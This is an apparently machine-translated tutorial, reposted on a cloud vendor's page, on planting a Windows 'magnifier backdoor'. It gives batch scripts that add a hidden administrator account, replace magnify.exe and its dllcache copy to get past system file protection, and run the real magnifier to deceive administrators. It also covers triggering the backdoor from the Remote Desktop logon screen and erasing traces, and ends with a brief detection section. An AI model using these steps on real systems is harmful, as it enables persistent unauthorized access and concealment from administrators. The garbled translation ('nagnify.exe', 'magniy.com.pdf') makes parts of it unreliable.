WINDOWS system backdoor instance 2

Source: Internet
Author: User

Magnifiers, the most tricky Backdoor

MagnifiersMagnify. Exe) is a small tool integrated with Windows 2000/XP/2003 systems. It is designed to help users with visual impairment. The tool can be used with the “win+u”combination before the user's guest system. For this reason, the attacker can replace the magnifier program with a file of the same name as magnify.exe, which is specially crafted to control the server.

In general, the attacker creates an administrator user through the magnify.exe program, and then logs on to the system. Of course, sometimes they will also pass through its direct call with the command line to indicate the system shellexplorer.exe ). It should be noted that the called programs are all system permissions, that is, the highest system permissions. However, in case the Administrator finds flaws when running the magnifier program, the attacker generally runs the real magnifier program to cheat the Administrator after completing the required operations through the constructor. The method is as follows:

1) construct a batch processing script

 
 
  1. @echo off  
  2.  
  3. net user gslw$ test168 /add  
  4.  
  5. net localgroup administrators gslw$ /add  
  6.  
  7. %Windir%\system32\nagnify.exe  
  8.  
  9. exit 

. Figure 2)

2) File Format Conversion

Because the batch file magnify. bat is suffixed with bat, it must be converted to an exe file of the same name before it can be called through Win + U. Attackers can use WinRar to construct an automatically decompressed exe compressed file. Of course, they can also use bat2com and com2exe to convert the file format. Let's take the following method as an example.

Open the command line, enter the directory where the bat2com and com2exe tools are located, and then run the command "bat2com magnify. bat "will magnify. convert bat to magniy.com and run the "com2exe magniy.com.pdf" command to convert magniy.cominto magniy.exe. In this way, the batch file is converted into a program file with the same name as the magnifier program. Figure 3)

3) magnifier file replacement

Replacement, through which we can replace system files. In addition, because the system file is stored in % Windir % \ system32 \ dllcache, the file must be replaced with the magnify.exe file in the directory first. The pseudo-structure magnify.exe file is located in the % Windir % directory. We can use a batch to replace the file.

 
 
  1. @echo off  
  2.  
  3. copy %Windir%\system32\dllcache\magnify.exe nagnify.exe  
  4.  
  5. copy %Windir%\system32\magnify.exe nagnify.exe  
  6.  
  7. replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache  
  8.  
  9. replace.exe %Windir%\magnify.exe %Windir%\system32  
  10.  
  11. exit 

The batch processing function is to first convert the magnifier program into nagnify.exe and then replace it with a constructor of the same name. Figure 4)

4) attack Exploitation

After completing the preceding operations, a magnifier backdoor is created. Then, the attacker connects to the server through the Remote Desktop, presses the Win + U key on the local keyboard in the logon interface window, and selects the magnifier to run ", at this moment, an administrator gslw $ is created on the server and the Magnifier tool is enabled. Then, attackers can log on to the server through this account. Of course, the attacker will delete all information related to the account before disconnecting the account to prevent the administrator from discovering it. Figure 5)
 

5) Preventive measures

Check whether the file icon of % Windir % \ system32 \ magnify.exe is the original magnifier icon. If not, a magnifier backdoor may be implanted. Of course, sometimes attackers will change the file icon to the same as that of the original magnifier program. Then we can modify the size and modification time of the magnify.exe file. If either of the two files does not match, we are skeptical.

You can also run magnify.exe and then run lusrmgr. msc to check whether there are any suspicious users. If you confirm that the server has a magnifier backdoor, you must first delete the file and restore the normal magnifier program. Of course, we can also do something more thoroughly and replace the magnifier program with an insignificant program. Even though we can use it to protect our lives, we can construct a magnify.exe, through which we can warn attackers or conduct intrusion monitoring and evidence collection.

.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.